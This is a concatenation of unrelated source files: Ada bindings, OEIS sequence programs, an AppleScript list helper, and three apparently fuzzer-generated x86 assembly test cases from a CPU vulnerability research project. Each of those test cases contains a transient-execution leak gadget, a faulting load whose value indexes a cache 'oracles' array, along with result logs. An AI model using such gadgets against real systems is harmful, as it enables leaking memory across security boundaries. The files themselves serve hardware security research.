Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_68_1336.asm	ljhsiun2/medusa	9	166256	<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r9 push %rax push %rcx push %rdi push %rdx push %rsi lea addresses_normal_ht+0x171a7, %rsi lea addresses_A_ht+0x8227, %rdi nop add $46154, %rax mov $107, %rcx rep movsw add $27075, %rcx lea addresses_UC_ht+0xb827, %r12 nop and $28077, %rsi movl $0x61626364, (%r12) nop sub $40511, %rax lea addresses_D_ht+0x11a27, %r12 nop cmp %r9, %r9 vmovups (%r12), %ymm7 vextracti128 $1, %ymm7, %xmm7 vpextrq $1, %xmm7, %rdi nop nop nop nop nop sub $17320, %r9 lea addresses_A_ht+0x337, %rdi dec %r12 mov (%rdi), %cx nop nop nop nop add %rax, %rax lea addresses_WC_ht+0xc127, %rdx nop nop sub %r12, %r12 mov (%rdx), %ax nop nop add $11983, %rcx lea addresses_normal_ht+0x10227, %rsi nop nop nop sub $30343, %rcx movb (%rsi), %r12b nop nop nop nop and %rax, %rax lea addresses_D_ht+0x18da7, %rsi lea addresses_WC_ht+0x7a17, %rdi and $23898, %r11 mov $49, %rcx rep movsq nop nop add $8538, %r11 lea addresses_A_ht+0x1eb87, %rsi lea addresses_A_ht+0x68b7, %rdi clflush (%rdi) nop nop nop sub $11994, %r12 mov $8, %rcx rep movsl nop nop nop and %rsi, %rsi lea addresses_normal_ht+0x1a27, %rdi nop nop nop nop nop add %rsi, %rsi movl $0x61626364, (%rdi) nop nop inc %r11 lea addresses_normal_ht+0x1e627, %rcx nop nop nop nop mfence movw $0x6162, (%rcx) nop nop nop nop nop add $47634, %rsi lea addresses_normal_ht+0x16627, %r11 nop nop sub $27924, %rdx mov (%r11), %si nop nop nop nop add $51101, %r11 lea addresses_D_ht+0xeb03, %rdx nop nop nop nop nop xor $8473, %rax movb $0x61, (%rdx) nop nop nop nop xor $24216, %rax lea addresses_WT_ht+0x17a27, %rsi lea addresses_D_ht+0x3750, %rdi cmp $5419, %r9 mov $115, %rcx rep movsq sub %rdx, %rdx lea addresses_WT_ht+0x11a27, %rsi lea addresses_normal_ht+0x1efa7, %rdi clflush (%rdi) nop sub $24948, %rax mov $62, %rcx rep movsl nop nop nop nop cmp $26694, %r9 pop %rsi pop %rdx pop %rdi pop %rcx pop %rax pop %r9 pop %r12 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r15 push %r8 push %rbp push %rbx push %rdi // Store lea addresses_WT+0x134a7, %r8 nop nop dec %rdi mov $0x5152535455565758, %r12 movq %r12, %xmm0 movups %xmm0, (%r8) nop nop nop nop cmp $34155, %r12 // Faulty Load mov $0xa27, %rbx nop nop nop nop nop sub $17451, %r10 mov (%rbx), %r12d lea oracles, %r8 and $0xff, %r12 shlq $12, %r12 mov (%r8,%r12,1), %r12 pop %rdi pop %rbx pop %rbp pop %r8 pop %r15 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_P'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'} [Faulty Load] {'src': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_P'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'congruent': 4, 'same': False, 'type': 'addresses_normal_ht'}, 'dst': {'congruent': 10, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'} {'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 9, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'} {'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'} {'src': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 6, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'} {'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'} {'src': {'congruent': 4, 'same': False, 'type': 'addresses_A_ht'}, 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'} {'dst': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 9, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'} {'dst': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'} {'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 10, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'dst': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 2, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'STOR'} {'src': {'congruent': 11, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'} {'src': {'congruent': 7, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'} {'00': 68} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
src/generated/runetype_h.ads	csb6/libtcod-ada	0	17240	<gh_stars>0 pragma Ada_2012; pragma Style_Checks (Off); with Interfaces.C; use Interfaces.C; with i386_utypes_h; with Interfaces.C.Strings; with System; package runetype_h is --- -- * Copyright (c) 1993 -- * The Regents of the University of California. All rights reserved. -- * -- * This code is derived from software contributed to Berkeley by -- * <NAME> at Krystal Technologies. -- * -- * Redistribution and use in source and binary forms, with or without -- * modification, are permitted provided that the following conditions -- * are met: -- * 1. Redistributions of source code must retain the above copyright -- * notice, this list of conditions and the following disclaimer. -- * 2. Redistributions in binary form must reproduce the above copyright -- * notice, this list of conditions and the following disclaimer in the -- * documentation and/or other materials provided with the distribution. -- * 3. All advertising materials mentioning features or use of this software -- * must display the following acknowledgement: -- * This product includes software developed by the University of -- * California, Berkeley and its contributors. -- * 4. Neither the name of the University nor the names of its contributors -- * may be used to endorse or promote products derived from this software -- * without specific prior written permission. -- * -- * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND -- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -- * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE -- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS -- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) -- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT -- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY -- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF -- * SUCH DAMAGE. -- * -- * @(#)runetype.h 8.1 (Berkeley) 6/2/93 -- -- * The lower 8 bits of runetype[] contain the digit value of the rune. -- -- First rune of the range -- Last rune (inclusive) of the range -- What first maps to in maps -- Array of types in range type u_RuneEntry is record uu_min : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:61 uu_max : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:62 uu_map : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:63 uu_types : access i386_utypes_h.uu_uint32_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:64 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:65 -- Number of ranges stored -- Pointer to the ranges type u_RuneRange is record uu_nranges : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:68 uu_ranges : access u_RuneEntry; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:69 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:70 -- CHARCLASS_NAME_MAX = 14 -- charclass mask subtype u_RuneCharClass_array1132 is Interfaces.C.char_array (0 .. 13); type u_RuneCharClass is record uu_name : aliased u_RuneCharClass_array1132; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:73 uu_mask : aliased i386_utypes_h.uu_uint32_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:74 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:75 -- Magic saying what version we are -- ASCII name of this encoding -- * The following are to deal with Runes larger than _CACHED_RUNES - 1. -- * Their data is actually contiguous with this structure so as to make -- * it easier to read/write from/to disk. -- -- Data which depends on the encoding -- how long that data is -- * extra fields to deal with arbitrary character classes -- subtype u_RuneLocale_array828 is Interfaces.C.char_array (0 .. 7); subtype u_RuneLocale_array1136 is Interfaces.C.char_array (0 .. 31); type u_RuneLocale_array1147 is array (0 .. 255) of aliased i386_utypes_h.uu_uint32_t; type u_RuneLocale_array1149 is array (0 .. 255) of aliased i386_utypes_h.uu_darwin_rune_t; type u_RuneLocale is record uu_magic : aliased u_RuneLocale_array828; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:78 uu_encoding : aliased u_RuneLocale_array1136; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:79 uu_sgetrune : access function (arg1 : Interfaces.C.Strings.chars_ptr; arg2 : i386_utypes_h.uu_darwin_size_t; arg3 : System.Address) return i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:81 uu_sputrune : access function (arg1 : i386_utypes_h.uu_darwin_rune_t; arg2 : Interfaces.C.Strings.chars_ptr; arg3 : i386_utypes_h.uu_darwin_size_t; arg4 : System.Address) return int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:82 uu_invalid_rune : aliased i386_utypes_h.uu_darwin_rune_t; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:83 uu_runetype : aliased u_RuneLocale_array1147; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:85 uu_maplower : aliased u_RuneLocale_array1149; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:86 uu_mapupper : aliased u_RuneLocale_array1149; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:87 uu_runetype_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:94 uu_maplower_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:95 uu_mapupper_ext : aliased u_RuneRange; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:96 uu_variable : System.Address; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:98 uu_variable_len : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:99 uu_ncharclasses : aliased int; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:104 uu_charclasses : access u_RuneCharClass; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:105 end record with Convention => C_Pass_By_Copy; -- /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/runetype.h:106 end runetype_h;
programs/oeis/051/A051960.asm	jmorken/loda	1	80649	<filename>programs/oeis/051/A051960.asm ; A051960: a(n) = C(n)(3n+2) where C(n) = Catalan numbers = A000108. ; 2,5,16,55,196,714,2640,9867,37180,140998,537472,2057510,7904456,30458900,117675360,455657715,1767883500,6871173870,26747767200,104268528210,406975466040,1590307356300,6220814327520,24357232569150,95452906901976,374369872911804,1469388245772160,5771284726028332 mov $5,$0 mov $7,2 lpb $7 clr $0,5 mov $0,$5 sub $7,1 add $0,$7 sub $0,1 mov $4,$0 div $4,2 mul $4,2 sub $4,$4 sub $0,$4 max $0,0 mul $4,2 cal $0,274104 ; a(n) = Sum_{k=0..n} (3k+2)*Catalan(k). mov $2,$0 add $3,1 mov $1,$3 mov $1,$0 add $4,2 mov $8,$7 cmp $8,1 mul $8,$0 add $6,$8 lpe min $5,1 mul $5,$1 mov $1,$6 sub $1,$5
Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0_notsx.log_4508_711.asm	ljhsiun2/medusa	9	6143	.global s_prepare_buffers s_prepare_buffers: push %r12 push %r9 push %rcx push %rdi push %rsi lea addresses_A_ht+0x1e3ab, %rsi lea addresses_WC_ht+0x12073, %rdi nop nop nop dec %r9 mov $81, %rcx rep movsb nop add $21414, %r12 pop %rsi pop %rdi pop %rcx pop %r9 pop %r12 ret .global s_faulty_load s_faulty_load: push %r11 push %r14 push %r9 push %rbp push %rbx push %rcx push %rsi // Load mov $0x198e17000000023b, %rbx nop nop nop nop xor %rbp, %rbp movb (%rbx), %r11b nop nop nop nop cmp %rbx, %rbx // Load lea addresses_A+0x9ac3, %r9 nop nop xor $4742, %rcx movb (%r9), %r11b nop nop nop nop inc %r14 // Faulty Load mov $0x198e17000000023b, %rbp clflush (%rbp) nop nop cmp $26005, %rcx movups (%rbp), %xmm5 vpextrq $0, %xmm5, %r11 lea oracles, %r14 and $0xff, %r11 shlq $12, %r11 mov (%r14,%r11,1), %r11 pop %rsi pop %rcx pop %rbx pop %rbp pop %r9 pop %r14 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 1, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 2}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 16, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_A_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}} {'00': 4508} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
programs/oeis/267/A267610.asm	neoneye/loda	22	23530	<gh_stars>10-100 ; A267610: Total number of OFF (white) cells after n iterations of the "Rule 182" elementary cellular automaton starting with a single ON (black) cell. ; 0,0,2,2,4,6,12,12,14,16,22,24,30,36,50,50,52,54,60,62,68,74,88,90,96,102,116,122,136,150,180,180,182,184,190,192,198,204,218,220,226,232,246,252,266,280,310,312,318,324,338,344,358,372,402,408,422,436,466,480,510,540,602,602,604,606,612,614,620,626,640,642,648,654,668,674,688,702,732,734,740,746,760,766,780,794,824,830,844,858,888,902,932,962,1024,1026,1032,1038,1052,1058 lpb $0 mov $2,$0 sub $0,1 seq $2,71055 ; Number of 0's in n-th row of triangle in A071038. add $1,$2 lpe mov $0,$1
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_578_1641.asm	ljhsiun2/medusa	9	179401	.global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r8 push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x1365b, %rdi nop sub $38688, %rdx mov (%rdi), %ebx nop nop and %r8, %r8 lea addresses_A_ht+0x1ab5b, %rsi lea addresses_D_ht+0x1e547, %rdi nop add $55608, %r12 mov $70, %rcx rep movsq nop cmp %rdi, %rdi lea addresses_normal_ht+0x661b, %rsi nop nop nop nop nop sub $19976, %rbx mov $0x6162636465666768, %r12 movq %r12, %xmm5 and $0xffffffffffffffc0, %rsi movntdq %xmm5, (%rsi) nop nop add $22750, %rsi lea addresses_normal_ht+0x174db, %rsi lea addresses_D_ht+0x89f7, %rdi nop nop and %r14, %r14 mov $56, %rcx rep movsq nop nop nop nop add %rdx, %rdx lea addresses_WC_ht+0x1b1eb, %rdx nop nop nop inc %rsi mov $0x6162636465666768, %rbx movq %rbx, (%rdx) and %rcx, %rcx lea addresses_A_ht+0x1755b, %rsi lea addresses_A_ht+0xb3db, %rdi nop nop cmp $29860, %r12 mov $84, %rcx rep movsw nop nop nop nop nop inc %rsi pop %rsi pop %rdx pop %rdi pop %rcx pop %rbx pop %r8 pop %r14 pop %r12 ret .global s_faulty_load s_faulty_load: push %r11 push %r14 push %r8 push %r9 push %rcx push %rdi push %rsi // Store lea addresses_PSE+0x16dd5, %r8 nop nop nop dec %r14 mov $0x5152535455565758, %r9 movq %r9, (%r8) dec %rcx // Store lea addresses_WC+0x129cb, %rdi nop nop nop nop cmp $52673, %r11 movl $0x51525354, (%rdi) xor %rdi, %rdi // Store lea addresses_PSE+0x1db5b, %rdi inc %r8 movl $0x51525354, (%rdi) nop nop nop nop cmp $23907, %r14 // Store lea addresses_US+0x1f85b, %rsi clflush (%rsi) nop sub $24750, %r14 movl $0x51525354, (%rsi) cmp $1120, %r11 // Faulty Load lea addresses_RW+0x655b, %rdi and %rsi, %rsi vmovups (%rdi), %ymm4 vextracti128 $1, %ymm4, %xmm4 vpextrq $1, %xmm4, %rcx lea oracles, %r11 and $0xff, %rcx shlq $12, %rcx mov (%r11,%rcx,1), %rcx pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 pop %r14 pop %r11 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 9, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'size': 4, 'AVXalign': True, 'NT': False, 'congruent': 8, 'same': False}} {'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': False, 'NT': True, 'congruent': 4, 'same': False}} {'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': True}} {'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 7, 'same': True}} {'32': 578} 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 */
tools/scitools/conf/understand/ada/ada12/a-locale.ads	brucegua/moocos	1	23036	<gh_stars>1-10 ------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- A D A . L O C A L E S -- -- -- -- S p e c -- -- -- -- Copyright (C) 2010, Free Software Foundation, Inc. -- -- -- -- This specification is derived from the Ada Reference Manual for use with -- -- GNAT. In accordance with the copyright of that document, you can freely -- -- copy and modify this specification, provided that if you redistribute a -- -- modified version, any changes that you have made are clearly indicated. -- -- -- ------------------------------------------------------------------------------ package Ada.Locales is pragma Preelaborate (Locales); pragma Remote_Types (Locales); type Language_Code is array (1 .. 3) of Character range 'a' .. 'z'; type Country_Code is array (1 .. 2) of Character range 'A' .. 'Z'; Language_Unknown : constant Language_Code := "und"; Country_Unknown : constant Country_Code := "ZZ"; function Language return Language_Code; function Country return Country_Code; end Ada.Locales;
list/ListAsserter.applescript	GitSyncApp/applescripts	6	3297	(* * Note: to log the return value you must create an if statment that asserts the boolean value returned, short hand if statment should work ) on equals_to(a, b) return a = b end equals_to ( * {1,2,3,4} contains 3--true * Note: to log the return value you must create an if statment that asserts the boolean value returned, short hand if statment should work *) on contains_List(a, b) a contains b end contains_List --Add these to this class: -- add {1, 2, 3, 4} starts with {1} -- add {1, 2, 3, 4} ends with {3, 4} -- add {1, 2} is in {1, 2, 3}--true
